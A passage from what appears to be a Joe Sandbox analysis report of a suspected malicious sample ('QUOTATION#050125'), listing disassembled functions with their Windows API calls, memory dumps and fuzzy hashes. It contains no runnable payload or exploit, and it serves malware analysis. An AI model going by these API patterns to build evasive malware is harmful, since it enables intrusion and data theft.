                                                                                      • CloseHandle.KERNEL32(?), ref: 0014A63D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3488606520-0
                                                                                      • Opcode ID: 6d31f0a24dc67730b306b86238a2f03766c6d4902254dd9bad00e32ce68b122a
                                                                                      • Instruction ID: f99fbc2fe9efdee113bdb5f00376c049d9cc25e82fa84a770bcb8736d2113944
                                                                                      • Opcode Fuzzy Hash: 6d31f0a24dc67730b306b86238a2f03766c6d4902254dd9bad00e32ce68b122a
                                                                                      • Instruction Fuzzy Hash: A6A1B0716043019FE720DF24C886F6AB7E5AF84714F55881DF59A9B3D2D7B0EC418B92
                                                                                      Function 0014B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014BAA5
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014BB00
                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0014BB63
                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 0014BBA6
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014BBB3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                      • String ID:
                                                                                      • API String ID: 3740051246-0
                                                                                      • Opcode ID: 11aa2305b651cbc5975db79f878b5bfd9dd90e78438a746a37d6b47fdb8b0a2a
                                                                                      • Instruction ID: d28b93e3856744dc8ddb514ac532dc78a94645030a000818810e23ca1668c88b
                                                                                      • Opcode Fuzzy Hash: 11aa2305b651cbc5975db79f878b5bfd9dd90e78438a746a37d6b47fdb8b0a2a
                                                                                      • Instruction Fuzzy Hash: 4B616C31208241AFD714DF24C8D5E6ABBE5FF84318F54899CF4998B2A2DB31ED45CB92
                                                                                      Function 00128BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00128BCD
                                                                                      • VariantClear.OLEAUT32 ref: 00128C3E
                                                                                      • VariantClear.OLEAUT32 ref: 00128C9D
                                                                                      • VariantClear.OLEAUT32(?), ref: 00128D10
                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00128D3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                      • String ID:
                                                                                      • API String ID: 4136290138-0
                                                                                      • Opcode ID: 2b7a0d1c284677a059128f1ec9754c952fc3cc41060e95628d60e34986fc2dfa
                                                                                      • Instruction ID: a05c221047df2524d7e3b8a689dbfde00f8671fcdfdbebaa09b2d03f9f842889
                                                                                      • Opcode Fuzzy Hash: 2b7a0d1c284677a059128f1ec9754c952fc3cc41060e95628d60e34986fc2dfa
                                                                                      • Instruction Fuzzy Hash: 855159B5A01219EFDB14CF68D894EAAB7F8FF89310B158559E905DB350E730E921CFA0
                                                                                      Function 000F542E Relevance: 7.7, APIs: 5, Instructions: 152fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00103CD6,?,?,?,?,?,?,?,?,000F5BA3,?,?,00103CD6,?,?), ref: 000F5470
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00103CD6,00000005,00000000,00000000), ref: 000F552C
                                                                                      • WriteFile.KERNEL32(?,00103CD6,00000000,000F5BA3,00000000,?,?,?,?,?,?,?,?,?,000F5BA3,?), ref: 000F554B
                                                                                      • WriteFile.KERNEL32(?,?,00000001,000F5BA3,00000000,?,?,?,?,?,?,?,?,?,000F5BA3,?), ref: 000F5584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 977765425-0
                                                                                      • Opcode ID: 78e7a72796f5a7db176ed3f702ec89f072a77de78797331b14a0c5eafc5c19a8
                                                                                      • Instruction ID: 3048e01e5ca1c9f96a3417db456f294170786604d621d840916531a00690361f
                                                                                      • Opcode Fuzzy Hash: 78e7a72796f5a7db176ed3f702ec89f072a77de78797331b14a0c5eafc5c19a8
                                                                                      • Instruction Fuzzy Hash: DE51D171A00B099FDB11CFA8DC95AEEBBF9EF08701F14411AF655E7691D730AA41CBA0
                                                                                      Function 00138AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00138BAE
                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00138BDA
                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00138C32
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00138C57
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00138C5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                      • String ID:
                                                                                      • API String ID: 2832842796-0
                                                                                      • Opcode ID: f30fe97349459fed337fa84ae0e319cc53407bc54386becf26d1706eb95aa4d8
                                                                                      • Instruction ID: a1c345138d0aa051060291fe18ed7df0b694408a280f62cd068ea280c806e836
                                                                                      • Opcode Fuzzy Hash: f30fe97349459fed337fa84ae0e319cc53407bc54386becf26d1706eb95aa4d8
                                                                                      • Instruction Fuzzy Hash: DC511835A006159FCB05DF64C881EADBBF5FF48314F088459E849AB362DB35ED51DBA0
                                                                                      Function 00148EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00148F40
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00148FD0
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00148FEC
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00149032
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00149052
                                                                                        • Part of subcall function 000DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00131043,?,75CBE610), ref: 000DF6E6
                                                                                        • Part of subcall function 000DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0011FA64,00000000,00000000,?,?,00131043,?,75CBE610,?,0011FA64), ref: 000DF70D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                      • String ID:
                                                                                      • API String ID: 666041331-0
                                                                                      • Opcode ID: 6c5f4a52a3fa5066373da70bdc960e6b5b4f4b9e8ee3849f0594fd399df550ed
                                                                                      • Instruction ID: c40585d05bbe82e99b2ebfff2a120ce69578a4861bfc7eee649297b62c074f15
                                                                                      • Opcode Fuzzy Hash: 6c5f4a52a3fa5066373da70bdc960e6b5b4f4b9e8ee3849f0594fd399df550ed
                                                                                      • Instruction Fuzzy Hash: 3B513635600605DFCB15DF68C494DADBBF1FF49324B4580A9E80A9B762DB31ED89CB90
                                                                                      Function 00156B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00156C33
                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00156C4A
                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00156C73
                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0013AB79,00000000,00000000), ref: 00156C98
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00156CC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                      • String ID:
                                                                                      • API String ID: 3688381893-0
                                                                                      • Opcode ID: 9c2bae1bad8bc8f710dc28544e4ca507d0099e89715370da3a8783a06a176be9
                                                                                      • Instruction ID: b946714aeeb8eb5d3fc5feb23ee2e71c4033abe0697561862a49708655c759aa
                                                                                      • Opcode Fuzzy Hash: 9c2bae1bad8bc8f710dc28544e4ca507d0099e89715370da3a8783a06a176be9
                                                                                      • Instruction Fuzzy Hash: AC41D635604204EFD724CF28CC55FA97BA5EB09361F950228FCA9AF2E1C371AD85DAC0
                                                                                      Function 000D912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 000D9141
                                                                                      • ScreenToClient.USER32(00000000,?), ref: 000D915E
                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 000D9183
                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 000D919D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                      • String ID:
                                                                                      • API String ID: 4210589936-0
                                                                                      • Opcode ID: d60dfc8047f65869632cac979d2193073a116ab4b933ac3433ff6811a9153a6a
                                                                                      • Instruction ID: 53df3745ed2c6a9a411ca68c8ca088ac6858aebfe65eaf59ca1e272333caf9b9
                                                                                      • Opcode Fuzzy Hash: d60dfc8047f65869632cac979d2193073a116ab4b933ac3433ff6811a9153a6a
                                                                                      • Instruction Fuzzy Hash: 3D416075A0860AFBDF199F64C844BEEB774FF05320F208226E825A73D0C7346994CBA1
                                                                                      Function 00133874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 001338CB
                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00133922
                                                                                      • TranslateMessage.USER32(?), ref: 0013394B
                                                                                      • DispatchMessageW.USER32(?), ref: 00133955
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00133966
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                      • String ID:
                                                                                      • API String ID: 2256411358-0
                                                                                      • Opcode ID: 5e6049affda6fdfce261c52e28f3429419d34348fdf011dd35d90bb8a4253c67
                                                                                      • Instruction ID: 04172ca386666c26980e0d17df44222cfbceabf9c95cc5de7649ca78abe69b96
                                                                                      • Opcode Fuzzy Hash: 5e6049affda6fdfce261c52e28f3429419d34348fdf011dd35d90bb8a4253c67
                                                                                      • Instruction Fuzzy Hash: 7931D570904342EEEF35CB34D849BB637A8EB05308F04056EE472C65A0E3B49AC5CB55
                                                                                      Function 0013CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0013C21E,00000000), ref: 0013CF38
                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 0013CF6F
                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,0013C21E,00000000), ref: 0013CFB4
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0013C21E,00000000), ref: 0013CFC8
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0013C21E,00000000), ref: 0013CFF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                      • String ID:
                                                                                      • API String ID: 3191363074-0
                                                                                      • Opcode ID: ee9fb0d9fd9e1859c408ef7e737433daa9e9f4686ac987671318f0c49c279cf6
                                                                                      • Instruction ID: 09c3423ced454979a1c7cebd99538ac42e6bfac94cf85d9ac496ba870c6b7951
                                                                                      • Opcode Fuzzy Hash: ee9fb0d9fd9e1859c408ef7e737433daa9e9f4686ac987671318f0c49c279cf6
                                                                                      • Instruction Fuzzy Hash: 0B316B71500306EFDB24DFA5C8849ABBBFEEB14311F10842EF506E6601DB30AE41DBA0
                                                                                      Function 00121901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 00121915
                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 001219C1
                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 001219C9
                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 001219DA
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001219E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3382505437-0
                                                                                      • Opcode ID: 55efd2e95ace8a38d1163678509c86f997f0a1a21089592b9756659a9b7dafb9
                                                                                      • Instruction ID: c4eb4a62ed7d3f2ca8df01691fa29870492f848b3abe73891cb462da83a180d6
                                                                                      • Opcode Fuzzy Hash: 55efd2e95ace8a38d1163678509c86f997f0a1a21089592b9756659a9b7dafb9
                                                                                      • Instruction Fuzzy Hash: D8319171900229EFCF14CFA8DD99ADE7BB5EB54319F104225F921AB2D1C7709A94CB90
                                                                                      Function 00140930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(00000000), ref: 00140951
                                                                                      • GetForegroundWindow.USER32 ref: 00140968
                                                                                      • GetDC.USER32(00000000), ref: 001409A4
                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 001409B0
                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 001409E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                      • String ID:
                                                                                      • API String ID: 4156661090-0
                                                                                      • Opcode ID: 3239293efdda94dc5345fe0dd1d30e7dbc6b0ce2d740e28e6eee181006251116
                                                                                      • Instruction ID: 3ae7095384eaa390a5e445eaf1e722d5e75475223cbd48a82212d09b6bbb2410
                                                                                      • Opcode Fuzzy Hash: 3239293efdda94dc5345fe0dd1d30e7dbc6b0ce2d740e28e6eee181006251116
                                                                                      • Instruction Fuzzy Hash: 1F216D35600214EFD704EF65C885AAEBBE9EF58701F04846CF84A9B762CB30AD44CB90
                                                                                      Function 000D9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000D9693
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000D96A2
                                                                                      • BeginPath.GDI32(?), ref: 000D96B9
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000D96E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 2af06f765c6ea15dd036ba1eaef09794f3ec9068fc894614f94e30ddfa0e1066
                                                                                      • Instruction ID: 71d228909d3141b82fdb6e57ed2ced9a99ff6276c34a96134a3b468ac6123681
                                                                                      • Opcode Fuzzy Hash: 2af06f765c6ea15dd036ba1eaef09794f3ec9068fc894614f94e30ddfa0e1066
                                                                                      • Instruction Fuzzy Hash: 46214970802306EFDB119F65EC58BAD7BB9BB5036AF104217F821A66E0D37098D1CBA4
                                                                                      Function 0012000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?,?,0012035E), ref: 0012002B
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120046
                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120054
                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?), ref: 00120064
                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0011FF41,80070057,?,?), ref: 00120070
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3897988419-0
                                                                                      • Opcode ID: 638b3fe3b8cd6a7fdc8ced83bce8677b32c5fa4bdb983c2c7406482715991aa1
                                                                                      • Instruction ID: a1ecdaa1c54751f66b64a71ac297b3c2fa697e974267ba801a29feb8036a8b77
                                                                                      • Opcode Fuzzy Hash: 638b3fe3b8cd6a7fdc8ced83bce8677b32c5fa4bdb983c2c7406482715991aa1
                                                                                      • Instruction Fuzzy Hash: 5201A772600314FFEB114F64EC44BAA7AEDEF48792F144214F905D6221D771DD5087A4
                                                                                      Function 0012E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0012E997
                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 0012E9A5
                                                                                      • Sleep.KERNEL32(00000000), ref: 0012E9AD
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0012E9B7
                                                                                      • Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Memory Dump Source
